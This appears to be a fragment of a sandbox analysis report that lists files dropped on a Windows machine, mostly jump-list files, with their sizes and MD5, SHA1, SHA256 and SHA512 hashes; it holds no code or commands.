C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD53671ab0fc1d3692d632ce45007170e31
SHA1b7906be022b9186c18caecd4beba3301ee08849b
SHA2563f8779e7a539d3d4ef3792149074a1aa6f4978d862d2f5ad1ac2b6e5d3f34bde
SHA51258d9365b6149e53812756d97ff9269d5e0fa93ed3f86c5cf8605bc9145bd011ffb7f9dd8221409a548f909cbc7be53b166d7c22c2240f54cb51e8a46ca45641d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y6C8GC5PV8DTKPRIS6GX.temp
Filesize7KB
MD53671ab0fc1d3692d632ce45007170e31
SHA1b7906be022b9186c18caecd4beba3301ee08849b
SHA2563f8779e7a539d3d4ef3792149074a1aa6f4978d862d2f5ad1ac2b6e5d3f34bde
SHA51258d9365b6149e53812756d97ff9269d5e0fa93ed3f86c5cf8605bc9145bd011ffb7f9dd8221409a548f909cbc7be53b166d7c22c2240f54cb51e8a46ca45641d
-
Filesize
2KB
MD53e9af076957c5b2f9c9ce5ec994bea05
SHA1a8c7326f6bceffaeed1c2bb8d7165e56497965fe
SHA256e332ebfed27e0bb08b84dfda05acc7f0fa1b6281678e0120c5b7c893a75df47e
SHA512933ba0d69e7b78537348c0dc1bf83fb069f98bb93d31c638dc79c4a48d12d879c474bd61e3cbde44622baef5e20fb92ebf16c66128672e4a6d4ee20afbf9d01f
-
Filesize
724.8MB
MD50dabba05272439229d7463e08e836063
SHA1f46c049533ebb0d8b92bf6e718db6e7b17eb3d64
SHA2566d7056c8c31fc91e9ef9ee93f4b1f667c737a3ae0260131a7420e02dbd527107
SHA5123f56c82ea5c982686686b8b86d8eaafb991b32e9834939c90992d7d4356e1598e78fdf29fd7916e8da6ee660723a8710e342f3bf92f2e5abb68d3a4271df7a22